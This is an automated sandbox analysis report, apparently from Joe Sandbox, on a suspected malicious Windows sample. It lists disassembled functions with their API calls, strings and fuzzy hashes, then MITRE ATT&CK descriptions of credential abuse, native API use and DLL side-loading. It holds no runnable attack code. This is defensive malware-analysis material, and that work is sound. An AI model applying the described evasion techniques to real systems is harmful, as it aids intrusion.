0, xrefs: 006F290A

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 8f686a48ae21cf6db0bf29a5d3eb62ae1b97b39977e9988d3605806757f35bda
Instruction ID: 636d3409c934f7ce2f84f88b07815c5293de7c640a94128d3ce39002973c55f8
Opcode Fuzzy Hash: 8f686a48ae21cf6db0bf29a5d3eb62ae1b97b39977e9988d3605806757f35bda
Instruction Fuzzy Hash: BD31C331A0030E9FEB24CF99C895BFEBBB6EF45350F144029EA95A72A0D7B09944CF51

Function 007166D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00716761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0071676C

Strings

Combobox, xrefs: 0071672E

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 569beb44ee4781aaafcaa77acd30d093dc3e4d1411358b74347f5c676150a74a
Instruction ID: b6b78555ffd5037314e956d8e70fb6b5d111deb34b6514a03832886ad91da88e
Opcode Fuzzy Hash: 569beb44ee4781aaafcaa77acd30d093dc3e4d1411358b74347f5c676150a74a
Instruction Fuzzy Hash: DD118275300209AFEF11DF58DC81EFB376EEB493A8F104529F914972D0D6799C9187A0

Function 00716C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00691D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00691D73
Part of subcall function 00691D35: GetStockObject.GDI32(00000011), ref: 00691D87
Part of subcall function 00691D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00691D91

GetWindowRect.USER32(00000000,?), ref: 00716C71
GetSysColor.USER32(00000012), ref: 00716C8B

Strings

static, xrefs: 00716C4E

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 305e60b922bd9a03403802a1923165410e751f6891079b02df69bd4f0871224c
Instruction ID: 75976a7818bd5c59de92e64993aba173dcb67cd4d3b867e912121751cbe936fc
Opcode Fuzzy Hash: 305e60b922bd9a03403802a1923165410e751f6891079b02df69bd4f0871224c
Instruction Fuzzy Hash: 2221FC72510209AFDF04DFA8CC45AFA7BA9FB08715F104529F955D2290E639E851DB60

Function 00716920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 007169A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007169B1

Strings

edit, xrefs: 00716986

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 8f95b888b04aaaa634a6e3440d8474a7a82f59eaf325c453c9e97c1e566d97e9
Instruction ID: 57c5446605b86ecb4077cf531158b0e122fe291b2c41a78d25d5f40275e9ead4
Opcode Fuzzy Hash: 8f95b888b04aaaa634a6e3440d8474a7a82f59eaf325c453c9e97c1e566d97e9
Instruction Fuzzy Hash: 92114F71510204ABEF108F78DC45AEB376AEF053B4F508728F9A5971E0C779EC919B60

Function 006F29AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006F2A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 006F2A41

Strings

0, xrefs: 006F2A18

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 5d26c006013370fd58646daf7a46c1b34c44b825025eae9fe19b94753fa38eab
Instruction ID: 09618357b408570f523c4e197214142d35f3ec92040e2ce5715542f4fe3f1fb8
Opcode Fuzzy Hash: 5d26c006013370fd58646daf7a46c1b34c44b825025eae9fe19b94753fa38eab
Instruction Fuzzy Hash: 9511D03291121EABCB30DA9CD865BFA77BAAB45300F048021EA55E7390D774AD0ACB95

Function 007021D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0070222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00702255

Strings

<local>, xrefs: 0070221D

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: dc5e145151c65bc9b5395c75d9d79be064d0f9ba5f201e47d9ce902ad455af16
Instruction ID: f291391c534d83e0bf717d37bc261486fce1b429fcacd20c1dbfe11fecd97fcb
Opcode Fuzzy Hash: dc5e145151c65bc9b5395c75d9d79be064d0f9ba5f201e47d9ce902ad455af16
Instruction Fuzzy Hash: DF11E072541225FADB248F91CC89EFBFBE8FF16751F10832AFA0486081D2785896D6F0

Function 006A092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00693C14,007552F8,?,?,?), ref: 006A096E

Part of subcall function 00697BCC: _memmove.LIBCMT ref: 00697C06

_wcscat.LIBCMT ref: 006D4CB7

Strings

R, xrefs: 006A09AE

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID: R
API String ID: 257928180-2121812343
Opcode ID: f36ab44981d5c0afb02533e261094b75473bc04a842cdb119db5e71fa89e7c9c
Instruction ID: 0f4589e4c45fe15c6f4d73598f46d7a21df07b23407af7ff1265849efa7cbd60
Opcode Fuzzy Hash: f36ab44981d5c0afb02533e261094b75473bc04a842cdb119db5e71fa89e7c9c
Instruction Fuzzy Hash: 0711A9309052099B9F80FB64C815EDE73FAEF09351B0054A9F948D7285DAB4AB844B15

Function 006E8E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00697DE1: _memmove.LIBCMT ref: 00697E22

Part of subcall function 006EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 006EAABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 006E8E73

Strings

ListBox, xrefs: 006E8E3D
ComboBox, xrefs: 006E8E12

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: f9fa1643639c7a6332e32adb039eeb36fa51e0bd4dd1972f372489c84dae7b19
Instruction ID: 43e376c7ff0ab62cbe3dc24fbca1aa9863fb917ac57ca20ab08307b36e1662b1
Opcode Fuzzy Hash: f9fa1643639c7a6332e32adb039eeb36fa51e0bd4dd1972f372489c84dae7b19
Instruction Fuzzy Hash: A201F1B1602358AB9F15EBA5CC469FE736EAF05320B040A1DF826672E1DF355808C650

Function 006F8D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 006F8DAC
__fread_nolock.LIBCMT ref: 006F8DC1

Strings

EA06, xrefs: 006F8DF3

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 1414a157acc64d14254ba96f56834a0c6067ecf76422ea45afc50a9b3c60946d
Instruction ID: 52ecf6fd7a01377e2321c29389126c4786b868dac757dd2fae79566fb81ee2ec
Opcode Fuzzy Hash: 1414a157acc64d14254ba96f56834a0c6067ecf76422ea45afc50a9b3c60946d
Instruction Fuzzy Hash: F20196B29042187EDB68CAA88856EFE7BF89F15311F00459EE552D2181E975E6048760

Function 006E8CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00697DE1: _memmove.LIBCMT ref: 00697E22

Part of subcall function 006EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 006EAABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 006E8D6B

Strings

ListBox, xrefs: 006E8D35
ComboBox, xrefs: 006E8D0A

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 262cdaece8b267518722becc46c5eea29387c251fb05977856644759702dc44c
Instruction ID: 9af2d59cf1025c444fc53d2994cd794ad9a84597d0921a3a4db9e38553da7381
Opcode Fuzzy Hash: 262cdaece8b267518722becc46c5eea29387c251fb05977856644759702dc44c
Instruction Fuzzy Hash: 6201D4B1A42208ABDF15EBE1CD56AFE73AE9F15300F100029B806632D1DE155E08D275

Function 006E8D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00697DE1: _memmove.LIBCMT ref: 00697E22

Part of subcall function 006EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 006EAABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 006E8DEE

Strings

ListBox, xrefs: 006E8DBA
ComboBox, xrefs: 006E8D8F

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 0e705ab8167dc496ef407df1b002aaaf7fe411678bda6bbcab033558ac48f9e8
Instruction ID: d0a29b38fbbbc71113e14fe072f6ca462c58f06dd449a4c562072d33d5da1e81
Opcode Fuzzy Hash: 0e705ab8167dc496ef407df1b002aaaf7fe411678bda6bbcab033558ac48f9e8
Instruction Fuzzy Hash: B301F7B1A42248ABDF15E6A5CD42AFE73AE8F15300F104019F806A32D1DE155E08D275

Function 006EC4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 006EC534

Part of subcall function 006EC816: _memmove.LIBCMT ref: 006EC860
Part of subcall function 006EC816: VariantInit.OLEAUT32(00000000), ref: 006EC882
Part of subcall function 006EC816: VariantCopy.OLEAUT32(00000000,?), ref: 006EC88C

VariantClear.OLEAUT32(?), ref: 006EC556

Strings

d}t, xrefs: 006EC517

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Variant$Init$ClearCopy_memmove
String ID: d}t
API String ID: 2932060187-2103838832
Opcode ID: af5fbf8599f2c744cac2209cee57390f080991a6a251f41d13e780452e3bd98e
Instruction ID: 8e778d0d777d3b541acdf5aebe187301811005ca9d6249e27f2748a2e641273a
Opcode Fuzzy Hash: af5fbf8599f2c744cac2209cee57390f080991a6a251f41d13e780452e3bd98e
Instruction Fuzzy Hash: 011100719007089FCB10DF9AD88489AF7F8FF08310B50862EE58AD7651E771AA45CF94

Function 006F4F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 006F4F46
_wcscmp.LIBCMT ref: 006F4F58

Strings

#32770, xrefs: 006F4F52

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 3f340aac350ecc35a93d7959622ab032bca567c448c514b5726b6d41a78e6510
Instruction ID: d7cefe37e6e70902bfb6e3f8e39c7739ee6d11930e4908f495e64ada02c07068
Opcode Fuzzy Hash: 3f340aac350ecc35a93d7959622ab032bca567c448c514b5726b6d41a78e6510
Instruction Fuzzy Hash: 55E0227260022C2AD320AA99AC09BE7F7ACEB81B20F00002AFD04D3180EA609A5187E4

Function 006CB2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 006CB314: _memset.LIBCMT ref: 006CB321

Part of subcall function 006B0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,006CB2F0,?,?,?,0069100A), ref: 006B0945

IsDebuggerPresent.KERNEL32(?,?,?,0069100A), ref: 006CB2F4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0069100A), ref: 006CB303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 006CB2FE

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: c813ccdb4eccc7efcf79fea5dbd59714df43f1f0ccbff1c6e29b33679fe1d10e
Instruction ID: 4f0d2c2adba88511a4efab4770b44735299bbbf57716d5cfddb9c8a47b07a730
Opcode Fuzzy Hash: c813ccdb4eccc7efcf79fea5dbd59714df43f1f0ccbff1c6e29b33679fe1d10e
Instruction Fuzzy Hash: 31E06DB02007808FE760EF28E4097967AE8FF00304F04CA6CE45AC7642EBB8E444CBA1

Function 006D1935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 006D1775

Part of subcall function 0070BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,006D195E,?), ref: 0070BFFE
Part of subcall function 0070BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0070C010

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 006D196D

Strings

WIN_XPe, xrefs: 006D1788

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: c2cb29e2c03458fb8b8cc8bb820a3e1acf30675bc446dd0e17f2cfdcdff3bb94
Instruction ID: 1f9eae8d15fe540949d132d27c39cf46d92e9149ab67d2a6246cbfffbedfec66
Opcode Fuzzy Hash: c2cb29e2c03458fb8b8cc8bb820a3e1acf30675bc446dd0e17f2cfdcdff3bb94
Instruction Fuzzy Hash: 89F0C970C04109EFDB15DB95C988AECBBF9BB09301F544096E102A72A1D7B55F85DF64

Function 00715964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0071596E
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00715981

Part of subcall function 006F5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006F52BC

Strings

Shell_TrayWnd, xrefs: 00715967

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: da5847e0ea525442600f47ed305010fefcbe6e6cad774b33452a7c898370e523
Instruction ID: 1c0cdf975f776e0b640778eeb9d582b7747b12b506403f0c99a017a827248e3d
Opcode Fuzzy Hash: da5847e0ea525442600f47ed305010fefcbe6e6cad774b33452a7c898370e523
Instruction Fuzzy Hash: 6ED01231784715BBE7A4BB749C0FFE7AA15BF00B50F008839F34EAA1D1C9E89810C658

Function 00715998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007159AE
PostMessageW.USER32(00000000), ref: 007159B5

Part of subcall function 006F5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006F52BC

Strings

Shell_TrayWnd, xrefs: 007159A7

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 4d9dbe2683a19f432b9e6469e76a1b4adcf7434a2781b8962ba0df4a820b1b81
Instruction ID: a69a987a50df52c842f9a5fd51c4d68a5a984f2c3c2ff23e84a7ea0e5f424e5f
Opcode Fuzzy Hash: 4d9dbe2683a19f432b9e6469e76a1b4adcf7434a2781b8962ba0df4a820b1b81
Instruction Fuzzy Hash: 61D0C9317807157AE6A4AB749C0BFD6A615BB04B50F008829F34AAA1D1C9E8A810C658

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

